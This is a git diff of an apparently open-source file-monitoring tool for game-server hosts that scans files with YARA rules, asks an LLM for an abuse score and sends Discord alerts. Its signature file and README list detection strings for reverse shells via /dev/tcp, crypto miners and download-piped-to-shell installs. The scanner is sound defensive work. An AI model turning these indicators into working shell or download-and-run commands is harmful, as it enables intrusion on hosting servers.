Compare commits

...

No commits in common. "9562bcbf805903cc00d3736b6f5b0b690b42234d" and "baf866f6151c7c3e1ae3ffe3a24677e5ae5d022c" have entirely different histories.

14 changed files with 686 additions and 5 deletions

.gitignore vendored Normal file

@@ -0,0 +1,3 @@
start.sh
config.toml
__pycache__

BIN Frame_12x.webp Normal file

Binary file not shown (47 KiB).

LICENSE

@@ -208,8 +208,8 @@ If you develop a new program, and you want it to be of the greatest possible use
To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the “copyright” line and a pointer to where the full notice is found.
anti-abuse
Copyright (C) 2025 Novel
RADAR
Copyright (C) 2025 Lisa_Stuff
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
@@ -221,7 +221,7 @@ Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode:
anti-abuse Copyright (C) 2025 Novel
RADAR Copyright (C) 2025 Lisa_Stuff
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details.

README.md

@@ -1,3 +1,50 @@
# anti-abuse
![Novel](/Frame_12x.webp)
Anti-Abuse is a ✨ FREE, open-source radar based on YARA rules, built for Pterodactyl and Pelican nodes and Docker containers.
# Novel, Anti-Abuse
Introducing Anti-Abuse by Novel.
Anti-Abuse is a ✨ FREE, open-source radar based on YARA rules, built for Pterodactyl and Pelican nodes and Docker containers.
## Features
1. Watchdog-based real-time monitoring.
2. Easily customizable via [YARA rules](https://yara.readthedocs.io/en/stable/writingrules.html).
3. Various integrations (Discord webhook, etc.).
4. Easy re-checking of flagged files through AI-based analysis.
## Installation
Requirements: python, keyboard, brain
1. Install the requirements (`tomllib` is part of the standard library on Python 3.11+; the YARA bindings are published on PyPI as `yara-python`):
```bash
pip install watchdog yara-python pystyle requests
```
2. Configure config.toml and upload your YARA (.yar and .yara) signatures to /signatures.
3. Run RADAR:
```bash
python3 main.py
```
Done! You're now running Anti-Abuse.
# Tips
Tip 1: Don't know how to write YARA rules?
> Check out [awesome-yara](https://github.com/InQuest/awesome-yara), a repository with a curated list of YARA rule collections you can use. Didn't find what you were looking for? Try writing your own rules; see the [YARA documentation](https://yara.readthedocs.io/en/latest/index.html).
Tip 2: We recommend using https://console.groq.com instead of a self-hosted OLLAMA instance for better performance!
> Note that https://console.groq.com offers a generous free tier, which should be enough for small and medium-sized deployments of Novel.
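To complement Tip 1: here is a minimal rule in the same shape as the bundled signatures/common.yara, showing the three sections a rule usually carries. The rule name and strings below are invented purely for illustration, not part of this project's signature set:

```yara
rule EXAMPLE_WGET_PIPE_SH {
    meta:
        description = "Illustrative only: flags the common 'download | sh' install pattern"
    strings:
        $a1 = "wget -qO-"
        $a2 = "curl -fsSL"
        $a3 = "| sh"
    condition:
        // fire when either downloader appears together with a pipe into sh
        1 of ($a1, $a2) and $a3
}
```

Drop a file like this into /signatures with a .yar or .yara extension and the scanner picks it up on the next event.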
# Reporting a security issue or vulnerability
Please contact us by email:
|Maintainer|Contact|
|----|---|
|Lisa|lisahonkay@gmail.com, `@_lisa_ns_` on discord|
|Lin|contact@who.ad, `@inxtagram` on discord|
Made with ❤️ by inxtagram and `_lisa_ns_`, licensed under [GNU GENERAL PUBLIC LICENSE, Version 3](http://lhhomeserver.ddns.net:3000/Lisa_Stuff/RADAR/src/branch/main/LICENSE)

TODO.md Normal file

@@ -0,0 +1,12 @@
TODO:
1. Scan jar files (decompile to scan, ref: https://github.com/abdihaikal/pyjadx)
2. Integration with pterodactyl (ref. py-dactyl or https://dashflo.net/docs/api/pterodactyl/v1/)
3. Integration with pelican (ref? https://pelican.dev/)
4. Integration with docker
6. Multithreading support (for scans)
9. Ability to add ignore paths or ignore files (multiple supported too!)
~~7. Multiple paths support. Example: watchdog_path = ["./path/one","/root/test/","./etc"]~~
~~5. Support for several AI models: if one fails to respond, the next model in the list will be used. Example: models = ["model1","model2","model3","etc"]~~
~~8. Ability to add ignore paths in integrations, or use a per-integration path, also with multiple paths supported~~

aaaastart.sh Normal file

@@ -0,0 +1 @@
ss

config.toml Normal file

@@ -0,0 +1,63 @@
ver = "250325d"
machineID = "node1"
#*************************************************#
# #
# LANGUAGES #
# #
#*************************************************#
[LANGUGAE.english]
novelStarted = "Novel(Anti Abuse) Started within - {}s."
#**************************************************#
# #
# LOGS #
# #
#**************************************************#
[LOGS]
processStartMsg = true
#**************************************************#
# #
# DETECTION #
# #
#**************************************************#
[DETECTION]
watchdogPath = "./"
SignaturePath = "./signatures"
watchdogIgnorePath = ["./signatures"]
watchdogIgnoreFile = ["./main.py", "./config.toml", "es/common.yara"]
#**************************************************#
# #
# INTEGRATION #
# #
#**************************************************#
[INTEGRATION.AI]
enabled = true
generate_models = ["llama-3.2-90b-vision-preview","llama-3.3-70b-versatile","llama-3.3-70b-specdec","llama-3.2-11b-vision-preview","llama3-70b-8192","llama-3.1-8b-instant","llama3-8b-8192","llama-3.2-3b-preview","llama-3.2-1b-preview"] # for home usage gemma3:1b recommended, for Groq llama-3.1-8b-instant
generate_endpoint = "http://IP:PORT/api/generate" # Can be empty if using groq
use_groq = true
groq_api_token = "" # Get one at https://console.groq.com/keys
# Example API key
prompt = "Analyze the given code and return an abuse score (0-10) with a brief reason. Example abuses: Crypto Mining, Shell Access, Nezha Proxy (VPN/Proxy usage), Disk Filling, Tor, DDoS, Abusive Resource Usage. Response format: '**5/10** <your reason>'. No extra messages."
[INTEGRATION.DISCORD]
enabled = true
webhook_url = ""
# Example webhook
truncate_text = true # Used only if AI INTEGRATION is enabled; when true, truncates text to the maximum allowed characters, when false splits it across several webhook messages.

main.py Normal file

@@ -0,0 +1,44 @@
#region Imports
import time, os, tomllib
from utils.Logger import Log
from utils.WatchdogHandler import DirWatcher
#endregion

#region Initialize
t = time.time()
with open("config.toml", "rb") as f:
    data = tomllib.load(f)
Log.v(str(data))
path = data['DETECTION']['watchdogPath']
Log.v("""
o    o                        8
8b   8                        8
8`b  8 .oPYo. o    o .oPYo.   8
8 `b 8 8    8 Y.  .P 8oooo8   8
8  `b8 8    8 `b..d' 8.       8
8   `8 `YooP' `YP'   `Yooo'   8
..:::..:.....:::...:::.....:..
::::::::::::::::::::::::::::::

Product  - ANTI-ABUSE
Release  - {}
License  - GNU GENERAL PUBLIC LICENSE, Version 3
""".format(data['ver']))
#endregion

if __name__ == "__main__":
    with DirWatcher(path, interval=1) as watcher:
        watcher.run()
    Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 1))))
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        exit()

signatures/common.yara Normal file

@@ -0,0 +1,56 @@
rule CHINESE_NEZHA_ARGO {
    strings:
        $a1 = "TkVaSEE=" // Base64 for "NEZHA"
        $a2 = "tunnel.json"
        $a3 = "vless"
        $a4 = "dmxlc3M=" // Base64 for "vless"
        $a5 = "/vmess"
        $a6 = "L3ZtZXNz" // Base64 for "/vmess"
        $a7 = "V0FSUA==" // Base64 for "WARP"
        $a8 = "/eooce/"
        $a9 = "ARGO_AUTH"
        $a10 = "--edge-ip-version"
        $a11 = "LS1lZGdlLWlwLXZlcnNpb24=" // Base64 for "--edge-ip-version"
        $a12 = "sub.txt"
        $a13 = "Server\x20is\x20running\x20on\x20port\x20"
        $a14 = "nysteria2"
        $a15 = "openssl req"
    condition:
        2 of ($a*)
}

rule OBFUSCATED_CODE {
    meta:
        description = "Detects an obfuscated script"
    strings:
        $f1 = "0x" nocase
        $f2 = "x20" nocase
        $f3 = "x0a" nocase
    condition:
        2 of ($f1, $f2, $f3)
}

rule OVERLOAD_CRYPTO_MINER {
    meta:
        ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e"
    strings:
        $a1 = "stratum+tcp"
        $a2 = "xmrig"
        $a3 = "crypto"
    condition:
        any of them
}

rule REVERSE_SHELL {
    strings:
        $a1 = "0>&1"
        $a2 = "sh"
        $a3 = "-i"
        $a4 = "0<&196"
        $a5 = "<>/dev/tcp"
        $a6 = "socket.socket"
    condition:
        2 of them
}
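The `2 of them` conditions above fire when at least two of a rule's strings occur anywhere in the scanned content. This is not the YARA engine itself, just a rough pure-Python illustration of that counting logic, using the REVERSE_SHELL strings as the example:

```python
# Strings copied from the REVERSE_SHELL rule above.
REVERSE_SHELL_STRINGS = ["0>&1", "sh", "-i", "0<&196", "<>/dev/tcp", "socket.socket"]


def n_of_them(src: str, patterns: list[str], threshold: int) -> bool:
    """Rough analogue of YARA's 'N of them': true when at least
    `threshold` of the patterns appear as substrings of src."""
    hits = sum(1 for p in patterns if p in src)
    return hits >= threshold


benign = "print('hello world')"
shell = "bash -i >& /dev/tcp/1.2.3.4/443 0>&1"

print(n_of_them(benign, REVERSE_SHELL_STRINGS, 2))  # False
print(n_of_them(shell, REVERSE_SHELL_STRINGS, 2))   # True
```

Like YARA, this matches substrings anywhere, so a short string such as `"sh"` also matches inside `"bash"`; that is why the rules pair short strings with a threshold rather than firing on any single hit.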

utils/Logger.py Normal file

@@ -0,0 +1,18 @@
from pystyle import Colors, Colorate
from datetime import datetime
import time


class Log:
    @staticmethod
    def s(text):  # success
        time_now = datetime.fromtimestamp(time.time()).strftime('%H:%M')
        print(Colors.gray + time_now + " " + Colorate.Horizontal(Colors.green_to_cyan, "SUCCESS", 1) + Colors.gray + " > " + Colors.light_gray + text + Colors.reset)

    @staticmethod
    def e(text):  # error
        time_now = datetime.fromtimestamp(time.time()).strftime('%H:%M')
        print(Colors.gray + time_now + " " + Colorate.Horizontal(Colors.red_to_purple, " ERROR ", 1) + Colors.gray + " > " + Colors.light_gray + text + Colors.reset)

    @staticmethod
    def v(data):  # verbose
        time_now = datetime.fromtimestamp(time.time()).strftime('%H:%M')
        print(Colors.gray + time_now + " " + Colorate.Horizontal(Colors.blue_to_white, "VERBOSE", 1) + Colors.gray + " > " + Colors.light_gray + data + Colors.reset)

utils/Scanner.py Normal file

@@ -0,0 +1,44 @@
#region Imports
import os, yara, tomllib
from utils.Logger import Log
#endregion

#region Variables
scanned_files_map = set()
ignored_files = {}
ignored_directories = {}

with open("./config.toml", "rb") as f:
    data = tomllib.load(f)
#endregion

#region scanfile
def scan(src):
    """
    Scan file content against every YARA rule file and return the matches.

    Args:
        src (str): The content of the file to be scanned.

    Returns:
        (matches, error_messages): two dicts keyed by rule-file name.
    """
    matches = {}
    error_messages = {}
    for filename in os.listdir(data['DETECTION']['SignaturePath']):
        if filename.endswith(".yara") or filename.endswith(".yar"):  # both are valid YARA extensions
            rule_path = os.path.join(data['DETECTION']['SignaturePath'], filename)
            try:
                rules = yara.compile(filepath=rule_path)
                file_matches = rules.match(data=src)
                if file_matches:
                    matches[filename] = file_matches
                    #for match in file_matches:
                    #    Log.v(f" - Rule: {match.rule}")
            except yara.Error as e:
                Log.e(e)
                error_messages[filename] = e
    return matches, error_messages
#endregion
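The extension check in the loop above can also be written with `str.endswith`'s tuple form, which covers both conventional YARA extensions in one call. A tiny standalone sketch of just that filtering step (the file names are made up):

```python
def is_signature_file(filename: str) -> bool:
    # .yar and .yara are both conventional YARA rule extensions.
    return filename.endswith((".yara", ".yar"))


files = ["common.yara", "miners.yar", "README.md", "notes.txt"]
print([f for f in files if is_signature_file(f)])  # ['common.yara', 'miners.yar']
```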

utils/WatchdogHandler.py Normal file

@@ -0,0 +1,198 @@
"""
CREDIT
Context manager for basic directory watching.
- <https://github.com/gorakhargosh/watchdog/issues/346>.
"""
from datetime import datetime, timedelta
from pathlib import Path
from time import sleep
import threading
import time
from typing import Callable, Self
from utils.Logger import Log
import tomllib
from watchdog.events import FileSystemEvent, FileSystemEventHandler
from watchdog.observers import Observer
from utils.Scanner import scan
from utils.integration.Discord import webhook
from utils.integration.AI import ai_analyse
t = time.time()
with open("config.toml", "rb") as f:
data = tomllib.load(f)
paths = data['DETECTION']['watchdogPath']
if not isinstance(paths, list):
paths = [paths]
ignore_paths = data['DETECTION'].get('watchdogIgnorePath', [])
ignore_files = data['DETECTION'].get('watchdogIgnoreFile', [])
def s(input_dict):
return [
{"name": key, "value": '\n'.join(' - ' + str(item) for item in items)}
for key, items in input_dict.items()
]
def c(d):
count = 0
for key in d:
if isinstance(d[key], list):
count += len(d[key])
return count
def analysis(event_path: str, file_content: str, flag_type: str):
"""
Process file events in a separate thread.
This function scans the file content, and if flagged,
performs AI analysis and sends a webhook notification.
"""
results = scan(file_content)
if results[0]:
Log.s(f"Flagged {event_path}")
analysis = ai_analyse(file_content)
msg = f"Total Flagged Pattern: {str(c(results[0]))}\n\n{analysis}"
webhook(event_path, s(results[0]), msg)
class DirWatcher:
"""Run a function when a directory changes."""
min_cooldown = 0.1
def __init__(
self,
watch_dir: Path,
interval: float = 0.2,
cooldown: float = 0.1,
):
if interval < self.min_cooldown:
raise ValueError(
f"Interval of {interval} seconds is less than the minimum cooldown of "
f"{self.min_cooldown} seconds."
)
if cooldown < self.min_cooldown:
raise ValueError(
f"Cooldown of {cooldown} seconds is less than the minimum cooldown of "
f"{self.min_cooldown} seconds."
)
self.watch_dir = watch_dir
self.interval = interval
self.cooldown = cooldown
def __enter__(self) -> Self:
self.observer = Observer()
self.observer.schedule(
ModifiedFileHandler(scan, self.cooldown), self.watch_dir, recursive=True
)
Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 5))))
self.observer.start()
return self
def __exit__(self, exc_type: Exception | None, *_) -> bool:
if exc_type and exc_type is KeyboardInterrupt:
self.observer.stop()
handled_exception = True
elif exc_type:
handled_exception = False
else:
handled_exception = True
self.observer.join()
return handled_exception
def run(self):
"""Check for changes on an interval."""
try:
while True:
sleep(self.interval)
except KeyboardInterrupt:
self.observer.stop()
exit()
exit()
class ModifiedFileHandler(FileSystemEventHandler):
"""Handle modified files using threading for processing."""
def __init__(self, func: Callable[[FileSystemEvent], None], cooldown: float):
self.cooldown = timedelta(seconds=cooldown)
self.triggered_time = datetime.min
def ignore_event(self, event: FileSystemEvent) -> bool:
for ignore_path in ignore_paths:
if event.src_path.startswith(ignore_path):
return True
for ignore_file in ignore_files:
if event.src_path.endswith(ignore_file):
return True
if event.src_path == ".":
return True
return False
def on_any_event(self, event: FileSystemEvent):
if self.ignore_event(event):
return True
def on_modified(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
with open(event.src_path, "r") as f:
src = f.read()
Log.v(f"FILE MODF | {event.src_path}")
# Process in a separate thread
threading.Thread(target=analysis, args=(event.src_path, src, "modification")).start()
self.triggered_time = datetime.now()
except Exception:
pass
def on_moved(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
Log.v(f"FILE MOV | {event.src_path} > {event.dest_path}")
# For moved events, you might choose to scan the original or destination file.
# Here, we'll scan the source path.
with open(event.src_path, "r") as f:
src = f.read()
threading.Thread(target=analysis, args=(event.src_path, src, "moved")).start()
self.triggered_time = datetime.now()
except Exception:
pass
def on_deleted(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
Log.v(f"FILE DEL | {event.src_path}")
self.triggered_time = datetime.now()
except Exception:
pass
def on_created(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
if event.is_directory:
return
else:
Log.v(f"file created: {event.src_path}")
with open(event.src_path, "r") as f:
content = f.read()
threading.Thread(target=analysis, args=(event.src_path, content, "creation")).start()
self.triggered_time = datetime.now()
except Exception:
pass
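The cooldown check used by every handler above is a simple debounce: an event is only processed when more than `cooldown` has elapsed since the last processed event. The core of that logic in isolation (class and method names here are illustrative, not part of the project):

```python
from datetime import datetime, timedelta


class Debounce:
    """Process an event only if `cooldown` has elapsed since the last processed one."""

    def __init__(self, cooldown_seconds: float):
        self.cooldown = timedelta(seconds=cooldown_seconds)
        self.triggered_time = datetime.min  # so the very first event always passes

    def should_process(self, now: datetime) -> bool:
        if (now - self.triggered_time) > self.cooldown:
            self.triggered_time = now  # remember when we last fired
            return True
        return False


d = Debounce(1.0)
t0 = datetime(2025, 1, 1, 12, 0, 0)
print(d.should_process(t0))                           # True  (first event)
print(d.should_process(t0 + timedelta(seconds=0.5)))  # False (within cooldown)
print(d.should_process(t0 + timedelta(seconds=2.0)))  # True  (cooldown elapsed)
```

One consequence of sharing a single `triggered_time` across all event types, as the handler above does, is that a burst of mixed events (create + modify) collapses into a single scan, which is usually what you want for editors that write files in several steps.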

utils/integration/AI.py Normal file

@@ -0,0 +1,93 @@
#region Imports
import tomllib
import requests
from utils.Logger import Log
#endregion

#region Variables
# Load configuration from the config.toml file
with open("./config.toml", "rb") as f:
    data = tomllib.load(f)

enabled = data["INTEGRATION"]["AI"]["enabled"]
generate_endpoint = data["INTEGRATION"]["AI"]["generate_endpoint"]
model_list = data["INTEGRATION"]["AI"]["generate_models"]
use_groq = data["INTEGRATION"]["AI"]["use_groq"]
groq_api = data["INTEGRATION"]["AI"]["groq_api_token"]
prompt = data["INTEGRATION"]["AI"]["prompt"]

# If Groq is enabled, update the generate endpoint
if use_groq:
    generate_endpoint = "https://api.groq.com/openai/v1/chat/completions"
#endregion


def generate_response(data):
    """Generate a response using the Groq or OLLAMA API, falling back through model_list."""
    error_messages = []
    for generate_model in model_list:
        try:
            headers = {
                "Content-Type": "application/json",
            }
            # Add authorization header if using Groq
            if use_groq:
                headers["Authorization"] = f"Bearer {groq_api}"
            # Create payload
            payload = {
                "model": generate_model,
                "temperature": 1,
                "max_completion_tokens": 1024,
                "top_p": 1,
                "stream": False,
                "stop": None,
            }
            # Conditional message structure for Groq
            if use_groq:
                payload["messages"] = [
                    {
                        "role": "system",
                        "content": f"{prompt}"
                    },
                    {
                        "role": "user",
                        "content": f"```code\n{data}\n```"
                    }
                ]
            else:
                payload["prompt"] = f"Using this data: {data}. Respond to this prompt: {prompt}\n"
            response = requests.post(generate_endpoint, json=payload, headers=headers)
            response.raise_for_status()
            if use_groq:
                return response.json()["choices"][0]["message"]["content"] + f"\n\n> AI Model: {generate_model}"
            else:
                return response.json()
        except requests.exceptions.RequestException as e:
            Log.e(f"Failed to generate response: {e}")
            Log.e(f"Using model: {generate_model}")
            error_messages.append(f"Model {generate_model} failed: {e}")
            # Fall through to the next model in the list instead of returning early.
    return f"All models failed to generate a response. Errors: {error_messages}"


def ai_analyse(src):
    """Analyze a file and generate a response based on the user's input."""
    if enabled:
        try:
            # Generate response using the file data
            response = generate_response(src)
            if response:
                #Log.s(f"Generated Response: {response}")
                return response
            else:
                return "No AI Description provided for this action; check config.toml maybe?"
        except Exception as e:
            Log.e(f"Unexpected error: {e}")
    else:
        return "No AI Description provided for this action; check config.toml maybe?"
    return None
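The model-fallback loop in generate_response can be exercised without any network access. This hypothetical sketch replaces the HTTP request with a plain callable per model, but keeps the same try-each-in-order shape and the same all-failed summary:

```python
def first_working(models, call):
    """Try each model in order; return the first successful result,
    or an error summary if every model fails (mirrors generate_response)."""
    errors = []
    for model in models:
        try:
            return call(model)
        except RuntimeError as e:
            errors.append(f"Model {model} failed: {e}")
    return f"All models failed to generate a response. Errors: {errors}"


def fake_call(model):
    # Hypothetical stand-in for the HTTP request: only "model-b" succeeds.
    if model != "model-b":
        raise RuntimeError("connection refused")
    return "**5/10** suspicious shell access"


print(first_working(["model-a", "model-b", "model-c"], fake_call))
# **5/10** suspicious shell access
```

The important detail is that the `except` block records the error and lets the loop continue; an early `return` inside it would defeat the whole fallback list.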

utils/integration/Discord.py Normal file

@@ -0,0 +1,102 @@
import tomllib, requests
from utils.Logger import Log


def load_config(file_path):
    """Load configuration from a TOML file."""
    try:
        with open(file_path, "rb") as f:
            data = tomllib.load(f)
        return data
    except FileNotFoundError:
        Log.e(f"Config file {file_path} not found.")
        return None
    except tomllib.TOMLDecodeError as e:
        Log.e(f"Failed to parse TOML file: {e}")
        return None


def truncate_text(text, limit):
    """Truncate text to the specified character limit with an ellipsis."""
    if len(text) > limit:
        return text[:limit - 3] + "..."  # Truncate and add ellipsis
    return text


def split_text(text, limit):
    """Split text into chunks of a specified character limit."""
    return [text[i:i + limit] for i in range(0, len(text), limit)]


def load_config_values(data):
    """Extract relevant values from the loaded configuration."""
    try:
        enabled = data["INTEGRATION"]["DISCORD"]["enabled"]
        discord_webhook_url = data["INTEGRATION"]["DISCORD"]["webhook_url"]
        ai_integration = data["INTEGRATION"]["AI"]["enabled"]
        truncate_text_flag = data["INTEGRATION"]["DISCORD"].get("truncate_text", True)
        return enabled, discord_webhook_url, ai_integration, truncate_text_flag
    except KeyError as e:
        Log.e(f"Missing key in config: {e}")
        return None, None, None, True


def webhook(file_path, yara_matches, ai=""):
    """Send a webhook to Discord with the given parameters."""
    config_file_path = "./config.toml"
    config_data = load_config(config_file_path)
    if config_data is None:
        Log.e("Failed to load configuration.")
        return
    enabled, discord_webhook_url, ai_integration, truncate_text_flag = load_config_values(config_data)
    if enabled:
        description = ai  # if ai_integration and ai else "No Description Provided for this action."
        # Handle truncation or splitting based on config
        if truncate_text_flag:
            description = truncate_text(description, 4092)
        else:
            description_chunks = split_text(description, 4092)
        # Create embeds
        embeds = []
        if truncate_text_flag:
            # Single embed if truncated
            embeds.append({
                "title": f"⚠️ WATCHDOG ALERT ⚠️ - {config_data['machineID']}",
                "description": description,
                "color": 65280,
                "fields": yara_matches,
                "author": {
                    "name": file_path
                },
                "thumbnail": {
                    "url": "https://images-ext-1.discordapp.net/external/ZdQffnnucK3DWYPeokYDWnFPATtlvszVNozmNhOdXBg/https/upload.wikimedia.org/wikipedia/commons/5/59/Empty.png?format=webp&quality=lossless"
                }
            })
        else:
            # Multiple embeds if split
            for idx, chunk in enumerate(description_chunks):
                embeds.append({
                    "title": f"⚠️ WATCHDOG ALERT ⚠️ (Part {idx + 1})",
                    "description": chunk,
                    "color": 65280,
                    "fields": yara_matches if idx == 0 else [],  # Fields only in the first embed
                    "author": {
                        "name": file_path if idx == 0 else None
                    },
                    "thumbnail": {
                        "url": "https://images-ext-1.discordapp.net/external/ZdQffnnucK3DWYPeokYDWnFPATtlvszVNozmNhOdXBg/https/upload.wikimedia.org/wikipedia/commons/5/59/Empty.png?format=webp&quality=lossless"
                    }
                })
        # Construct the payload
        payload = {
            "content": "",
            "embeds": embeds[:10],  # Discord allows a maximum of 10 embeds per payload
            "attachments": []
        }
        try:
            # Send POST request to Discord webhook
            response = requests.post(discord_webhook_url, json=payload)
            response.raise_for_status()  # Raise exception for HTTP errors
            Log.v(f"Report sent to Discord webhook for {file_path}")
        except requests.exceptions.RequestException as e:
            Log.e(f"Report was not sent to Discord webhook, error: {e}")